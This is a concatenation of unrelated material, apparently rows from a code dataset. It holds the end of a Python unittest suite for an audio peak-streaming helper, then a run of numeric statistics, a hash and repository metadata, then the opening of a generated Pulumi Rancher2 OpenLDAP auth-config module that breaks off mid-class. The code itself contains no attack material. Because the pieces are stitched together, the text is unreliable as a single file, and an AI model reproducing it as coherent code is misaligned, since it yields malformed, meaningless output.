expected = np.array([1., 5., 0.002, 0.1])
actual = self.psh.peak_amps
self.assertTrue(np.allclose(expected, actual))
def test_peak_amps_norm(self):
expected = np.array([1., 1., 1., 0.1])
actual = self.psh.peak_amps_norm
self.assertTrue(np.allclose(expected, actual))
def test_good_peaks(self):
expected = set([0, 1])
actual = self.psh.good_peaks
self.assertEqual(expected, actual)
def test_bad_peaks(self):
expected = set([2, 3])
actual = self.psh.bad_peaks
self.assertEqual(expected, actual)
def test_good_peaks_sorted(self):
expected = np.array([1, 0])
actual = self.psh.good_peaks_sorted
self.assertTrue(np.allclose(expected, actual))
def test_good_peaks_sorted_index(self):
expected = {0: 1, 1: 0}
actual = self.psh.good_peaks_sorted_index
self.assertEqual(expected, actual)
def test_good_peaks_sorted_avail(self):
expected = np.array([True, True])
actual = self.psh.good_peaks_sorted_avail
self.assertTrue(np.allclose(expected, actual))
def test_n_good_peaks(self):
expected = 2
actual = self.psh.n_good_peaks
self.assertTrue(np.allclose(expected, actual))
def test_smallest_good_peak_idx(self):
expected = 0
actual = self.psh.smallest_good_peak_idx
self.assertEqual(expected, actual)
def test_get_largest_peak(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.2],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
actual = psh.get_largest_peak()
expected = 2
self.assertEqual(expected, actual)
def test_update_largest_peak_list(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.2],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
expected_avail = np.array([True, True, True, True])
actual_avail = psh.good_peaks_sorted_avail
self.assertTrue(np.allclose(expected_avail, actual_avail))
expected_smallest_idx = 0
actual_smallest_idx = psh.smallest_good_peak_idx
self.assertEqual(expected_smallest_idx, actual_smallest_idx)
psh.update_largest_peak_list(1)
expected_avail = np.array([True, False, True, True])
actual_avail = psh.good_peaks_sorted_avail
self.assertTrue(np.allclose(expected_avail, actual_avail))
expected_smallest_idx = 0
actual_smallest_idx = psh.smallest_good_peak_idx
self.assertEqual(expected_smallest_idx, actual_smallest_idx)
psh.update_largest_peak_list(2)
expected_avail = np.array([False, False, True, True])
actual_avail = psh.good_peaks_sorted_avail
self.assertTrue(np.allclose(expected_avail, actual_avail))
expected_smallest_idx = 2
actual_smallest_idx = psh.smallest_good_peak_idx
self.assertEqual(expected_smallest_idx, actual_smallest_idx)
def test_get_closest_peak(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.2],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
actual = psh.get_closest_peak(237.2, [2, 4, 5])
expected = 2
self.assertEqual(expected, actual)
def test_get_peak_candidates(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.2],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
frame_idx = 0
f0_val = 4000.0
expected_cands = [1]
expected_from_good = True
actual_cands, actual_from_good = psh.get_peak_candidates(
frame_idx, f0_val
)
self.assertEqual(expected_cands, actual_cands)
self.assertEqual(expected_from_good, actual_from_good)
def test_get_peak_candidates2(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.002],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
frame_idx = 3
f0_val = 4125.5
expected_cands = [7]
expected_from_good = False
actual_cands, actual_from_good = psh.get_peak_candidates(
frame_idx, f0_val
)
self.assertEqual(expected_cands, actual_cands)
self.assertEqual(expected_from_good, actual_from_good)
def test_get_peak_candidates3(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.002],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
frame_idx = 3
f0_val = 0
expected_cands = None
expected_from_good = None
actual_cands, actual_from_good = psh.get_peak_candidates(
frame_idx, f0_val
)
self.assertEqual(expected_cands, actual_cands)
self.assertEqual(expected_from_good, actual_from_good)
def test_get_contour(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.002],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
psh.get_contour()
actual_contour_idx = psh.contour_idx
expected_contour_idx = [2, 3, 1]
self.assertEqual(expected_contour_idx, actual_contour_idx)
actual_c_len = psh.c_len
expected_c_len = [3]
self.assertEqual(expected_c_len, actual_c_len)
psh.get_contour()
actual_contour_idx = psh.contour_idx
expected_contour_idx = [2, 3, 1, 6, 5, 7, 4]
self.assertEqual(expected_contour_idx, actual_contour_idx)
actual_c_len = psh.c_len
expected_c_len = [3, 4]
self.assertEqual(expected_c_len, actual_c_len)
def test_peak_streaming(self):
S = np.array([
[0, 0, 0, 0],
[0, 0.002, 0, 0],
[1, 0, 5, 0],
[0, 0.3, 0.1, 0],
[0.1, 0, 0.2, 0],
[0, 0.5, 0, 0.2],
[0, 0, 0, 0]
])
times = np.array([0.05, 0.1, 0.15, 0.2])
freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
expected_c_numbers = np.array([0, 0, 0, 1, 1, 1, 1])
expected_c_times = np.array([0.15, 0.1, 0.05, 0.1, 0.15, 0.2, 0.05])
expected_c_freqs = np.array([103., 105., 103., 109., 107., 109., 107.])
expected_c_sal = np.array([5, 0.3, 1.0, 0.5, 0.2, 0.2, 0.1])
(actual_c_numbers,
actual_c_times,
actual_c_freqs,
actual_c_sal) = psh.peak_streaming()
self.assertTrue(np.allclose(expected_c_numbers, actual_c_numbers))
self.assertTrue(np.allclose(expected_c_times, actual_c_times))
self.assertTrue(np.allclose(expected_c_freqs, actual_c_freqs))
self.assertTrue(np.allclose(expected_c_sal, actual_c_sal))
class TestPeakStreamHelperNoPeaks(unittest.TestCase):
def setUp(self):
self.S = np.array([
[0., 0., 0.],
[1., 0., 1.],
[2., 0., 1.],
[3., 0., 1.],
[4., 0., 1.]
])
self.times = np.array([0.0, 0.5, 1.0])
self.freqs = np.array([10., 100., 150., 200., 300.])
self.amp_thresh = 0.9
self.dev_thresh = 0.9
self.n_gap = 3.234
self.pitch_cont = 80
self.psh = utils.PeakStreamHelper(
self.S, self.times, self.freqs, self.amp_thresh, self.dev_thresh,
self.n_gap, self.pitch_cont
)
def test_S(self):
expected = np.array([
[0., 0., 0.],
[1., 0., 1.],
[2., 0., 1.],
[3., 0., 1.],
[4., 0., 1.]
])
actual = self.psh.S
self.assertTrue(np.allclose(expected, actual))
def test_S_norm(self):
expected = np.array([
[0, 0, 0],
[0.25, 0, 1],
[0.5, 0, 1],
[0.75, 0, 1],
[1, 0, 1]
])
actual = self.psh.S_norm
self.assertTrue(np.allclose(expected, actual))
def test_times(self):
expected = np.array([0.0, 0.5, 1.0])
actual = self.psh.times
self.assertTrue(np.allclose(expected, actual))
def test_freqs(self):
expected = np.array([
0., 3986.31371386, 4688.26871473, 5186.31371386, 5888.26871473
])
actual = self.psh.freqs
self.assertTrue(np.allclose(expected, actual))
def test_amp_thresh(self):
expected = 0.9
actual = self.psh.amp_thresh
self.assertEqual(expected, actual)
def test_dev_thresh(self):
expected = 0.9
actual = self.psh.dev_thresh
self.assertEqual(expected, actual)
def test_n_gap(self):
expected = 3.234
actual = self.psh.n_gap
self.assertEqual(expected, actual)
def test_pitch_cont(self):
expected = 80
actual = self.psh.pitch_cont
self.assertEqual(expected, actual)
def test_n_peaks(self):
expected = 0
actual = self.psh.n_peaks
self.assertEqual(expected, actual)
def test_peak_index(self):
expected = np.array([])
actual = self.psh.peak_index
self.assertTrue(np.allclose(expected, actual))
def test_peak_time_index(self):
expected = np.array([])
actual = self.psh.peak_time_idx
self.assertTrue(np.allclose(expected, actual))
def test_first_peak_time_idx(self):
expected = None
actual = self.psh.first_peak_time_idx
self.assertEqual(expected, actual)
def test_last_peak_time_idx(self):
expected = None
actual = self.psh.last_peak_time_idx
self.assertEqual(expected, actual)
def test_frame_dict(self):
expected = {}
actual = self.psh.frame_dict
self.assertEqual(expected, actual)
def test_peak_freqs(self):
expected = np.array([])
actual = self.psh.peak_freqs
self.assertTrue(np.allclose(expected, actual))
def test_peak_amps(self):
expected = np.array([])
actual = self.psh.peak_amps
self.assertTrue(np.allclose(expected, actual))
def test_peak_amps_norm(self):
expected = np.array([])
actual = self.psh.peak_amps_norm
self.assertTrue(np.allclose(expected, actual))
def test_good_peaks(self):
expected = set()
actual = self.psh.good_peaks
self.assertEqual(expected, actual)
def test_bad_peaks(self):
expected = set()
actual = self.psh.bad_peaks
self.assertEqual(expected, actual)
def test_good_peaks_sorted(self):
expected = np.array([])
actual = self.psh.good_peaks_sorted
self.assertTrue(np.allclose(expected, actual))
def test_good_peaks_sorted_index(self):
expected = {}
actual = self.psh.good_peaks_sorted_index
self.assertEqual(expected, actual)
def test_good_peaks_sorted_avail(self):
expected = np.array([])
actual = self.psh.good_peaks_sorted_avail
self.assertTrue(np.allclose(expected, actual))
def test_n_good_peaks(self):
expected = 0
actual = self.psh.n_good_peaks
self.assertTrue(np.allclose(expected, actual))
def test_smallest_good_peak_idx(self):
expected = 0
actual = self.psh.smallest_good_peak_idx
self.assertEqual(expected, actual)
| 31.565056
| 79
| 0.554469
| 2,408
| 16,982
| 3.736711
| 0.047757
| 0.037342
| 0.02834
| 0.112025
| 0.91387
| 0.904201
| 0.882085
| 0.878751
| 0.840965
| 0.840076
| 0
| 0.100512
| 0.309858
| 16,982
| 537
| 80
| 31.623836
| 0.667235
| 0.002532
| 0
| 0.829646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15708
| 1
| 0.128319
| false
| 0
| 0.006637
| 0
| 0.139381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6caf177be60f963a1d158636a23493e44c9f3170
| 74,516
|
py
|
Python
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-03-23T15:59:11.000Z
|
2021-01-29T00:37:32.000Z
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 76
|
2020-01-16T20:00:25.000Z
|
2022-03-31T20:30:08.000Z
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-03-27T17:39:59.000Z
|
2020-11-24T23:09:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AuthConfigOpenLdapArgs', 'AuthConfigOpenLdap']
@pulumi.input_type
class AuthConfigOpenLdapArgs:
def __init__(__self__, *,
servers: pulumi.Input[Sequence[pulumi.Input[str]]],
service_account_distinguished_name: pulumi.Input[str],
service_account_password: pulumi.Input[str],
test_password: pulumi.Input[str],
test_username: pulumi.Input[str],
user_search_base: pulumi.Input[str],
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
tls: Optional[pulumi.Input[bool]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a AuthConfigOpenLdap resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
"""
pulumi.set(__self__, "servers", servers)
pulumi.set(__self__, "service_account_distinguished_name", service_account_distinguished_name)
pulumi.set(__self__, "service_account_password", service_account_password)
pulumi.set(__self__, "test_password", test_password)
pulumi.set(__self__, "test_username", test_username)
pulumi.set(__self__, "user_search_base", user_search_base)
if access_mode is not None:
pulumi.set(__self__, "access_mode", access_mode)
if allowed_principal_ids is not None:
pulumi.set(__self__, "allowed_principal_ids", allowed_principal_ids)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if connection_timeout is not None:
pulumi.set(__self__, "connection_timeout", connection_timeout)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if group_dn_attribute is not None:
pulumi.set(__self__, "group_dn_attribute", group_dn_attribute)
if group_member_mapping_attribute is not None:
pulumi.set(__self__, "group_member_mapping_attribute", group_member_mapping_attribute)
if group_member_user_attribute is not None:
pulumi.set(__self__, "group_member_user_attribute", group_member_user_attribute)
if group_name_attribute is not None:
pulumi.set(__self__, "group_name_attribute", group_name_attribute)
if group_object_class is not None:
pulumi.set(__self__, "group_object_class", group_object_class)
if group_search_attribute is not None:
pulumi.set(__self__, "group_search_attribute", group_search_attribute)
if group_search_base is not None:
pulumi.set(__self__, "group_search_base", group_search_base)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if nested_group_membership_enabled is not None:
pulumi.set(__self__, "nested_group_membership_enabled", nested_group_membership_enabled)
if port is not None:
pulumi.set(__self__, "port", port)
if tls is not None:
pulumi.set(__self__, "tls", tls)
if user_disabled_bit_mask is not None:
pulumi.set(__self__, "user_disabled_bit_mask", user_disabled_bit_mask)
if user_enabled_attribute is not None:
pulumi.set(__self__, "user_enabled_attribute", user_enabled_attribute)
if user_login_attribute is not None:
pulumi.set(__self__, "user_login_attribute", user_login_attribute)
if user_member_attribute is not None:
pulumi.set(__self__, "user_member_attribute", user_member_attribute)
if user_name_attribute is not None:
pulumi.set(__self__, "user_name_attribute", user_name_attribute)
if user_object_class is not None:
pulumi.set(__self__, "user_object_class", user_object_class)
if user_search_attribute is not None:
pulumi.set(__self__, "user_search_attribute", user_search_attribute)
@property
@pulumi.getter
def servers(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
OpenLdap servers list (list)
"""
return pulumi.get(self, "servers")
@servers.setter
def servers(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "servers", value)
@property
@pulumi.getter(name="serviceAccountDistinguishedName")
def service_account_distinguished_name(self) -> pulumi.Input[str]:
"""
Service account DN for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_distinguished_name")
@service_account_distinguished_name.setter
def service_account_distinguished_name(self, value: pulumi.Input[str]):
pulumi.set(self, "service_account_distinguished_name", value)
@property
@pulumi.getter(name="serviceAccountPassword")
def service_account_password(self) -> pulumi.Input[str]:
"""
Service account password for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_password")
@service_account_password.setter
def service_account_password(self, value: pulumi.Input[str]):
pulumi.set(self, "service_account_password", value)
@property
@pulumi.getter(name="testPassword")
def test_password(self) -> pulumi.Input[str]:
"""
Password for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_password")
@test_password.setter
def test_password(self, value: pulumi.Input[str]):
pulumi.set(self, "test_password", value)
@property
@pulumi.getter(name="testUsername")
def test_username(self) -> pulumi.Input[str]:
"""
Username for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_username")
@test_username.setter
def test_username(self, value: pulumi.Input[str]):
pulumi.set(self, "test_username", value)
@property
@pulumi.getter(name="userSearchBase")
def user_search_base(self) -> pulumi.Input[str]:
"""
User search base DN (string)
"""
return pulumi.get(self, "user_search_base")
@user_search_base.setter
def user_search_base(self, value: pulumi.Input[str]):
pulumi.set(self, "user_search_base", value)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> Optional[pulumi.Input[str]]:
"""
Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
"""
return pulumi.get(self, "access_mode")
@access_mode.setter
def access_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_mode", value)
@property
@pulumi.getter(name="allowedPrincipalIds")
def allowed_principal_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
"""
return pulumi.get(self, "allowed_principal_ids")
@allowed_principal_ids.setter
def allowed_principal_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_principal_ids", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Annotations of the resource (map)
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
"""
Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
"""
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="connectionTimeout")
def connection_timeout(self) -> Optional[pulumi.Input[int]]:
"""
OpenLdap connection timeout. Default `5000` (int)
"""
return pulumi.get(self, "connection_timeout")
@connection_timeout.setter
def connection_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_timeout", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable auth config provider. Default `true` (bool)
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="groupDnAttribute")
def group_dn_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group DN attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_dn_attribute")
@group_dn_attribute.setter
def group_dn_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_dn_attribute", value)
@property
@pulumi.getter(name="groupMemberMappingAttribute")
def group_member_mapping_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group member mapping attribute. Default `member` (string)
"""
return pulumi.get(self, "group_member_mapping_attribute")
@group_member_mapping_attribute.setter
def group_member_mapping_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_member_mapping_attribute", value)
@property
@pulumi.getter(name="groupMemberUserAttribute")
def group_member_user_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group member user attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_member_user_attribute")
@group_member_user_attribute.setter
def group_member_user_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_member_user_attribute", value)
@property
@pulumi.getter(name="groupNameAttribute")
def group_name_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group name attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_name_attribute")
@group_name_attribute.setter
def group_name_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_name_attribute", value)
@property
@pulumi.getter(name="groupObjectClass")
def group_object_class(self) -> Optional[pulumi.Input[str]]:
"""
Group object class. Default `groupOfNames` (string)
"""
return pulumi.get(self, "group_object_class")
@group_object_class.setter
def group_object_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_object_class", value)
@property
@pulumi.getter(name="groupSearchAttribute")
def group_search_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group search attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_search_attribute")
@group_search_attribute.setter
def group_search_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_search_attribute", value)
@property
@pulumi.getter(name="groupSearchBase")
def group_search_base(self) -> Optional[pulumi.Input[str]]:
"""
Group search base (string)
"""
return pulumi.get(self, "group_search_base")
@group_search_base.setter
def group_search_base(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_search_base", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Labels of the resource (map)
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="nestedGroupMembershipEnabled")
def nested_group_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Nested group membership enable. Default `false` (bool)
"""
return pulumi.get(self, "nested_group_membership_enabled")
@nested_group_membership_enabled.setter
def nested_group_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "nested_group_membership_enabled", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
OpenLdap port. Default `389` (int)
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input[bool]]:
"""
Enable TLS connection (bool)
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "tls", value)
@property
@pulumi.getter(name="userDisabledBitMask")
def user_disabled_bit_mask(self) -> Optional[pulumi.Input[int]]:
"""
User disabled bit mask (int)
"""
return pulumi.get(self, "user_disabled_bit_mask")
@user_disabled_bit_mask.setter
def user_disabled_bit_mask(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_disabled_bit_mask", value)
@property
@pulumi.getter(name="userEnabledAttribute")
def user_enabled_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User enable attribute (string)
"""
return pulumi.get(self, "user_enabled_attribute")
@user_enabled_attribute.setter
def user_enabled_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_enabled_attribute", value)
@property
@pulumi.getter(name="userLoginAttribute")
def user_login_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User login attribute. Default `uid` (string)
"""
return pulumi.get(self, "user_login_attribute")
@user_login_attribute.setter
def user_login_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_login_attribute", value)
@property
@pulumi.getter(name="userMemberAttribute")
def user_member_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User member attribute. Default `memberOf` (string)
"""
return pulumi.get(self, "user_member_attribute")
@user_member_attribute.setter
def user_member_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_member_attribute", value)
@property
@pulumi.getter(name="userNameAttribute")
def user_name_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User name attribute. Default `givenName` (string)
"""
return pulumi.get(self, "user_name_attribute")
@user_name_attribute.setter
def user_name_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name_attribute", value)
@property
@pulumi.getter(name="userObjectClass")
def user_object_class(self) -> Optional[pulumi.Input[str]]:
"""
User object class. Default `inetorgperson` (string)
"""
return pulumi.get(self, "user_object_class")
@user_object_class.setter
def user_object_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_object_class", value)
@property
@pulumi.getter(name="userSearchAttribute")
def user_search_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User search attribute. Default `uid|sn|givenName` (string)
"""
return pulumi.get(self, "user_search_attribute")
@user_search_attribute.setter
def user_search_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_search_attribute", value)
@pulumi.input_type
class _AuthConfigOpenLdapState:
def __init__(__self__, *,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
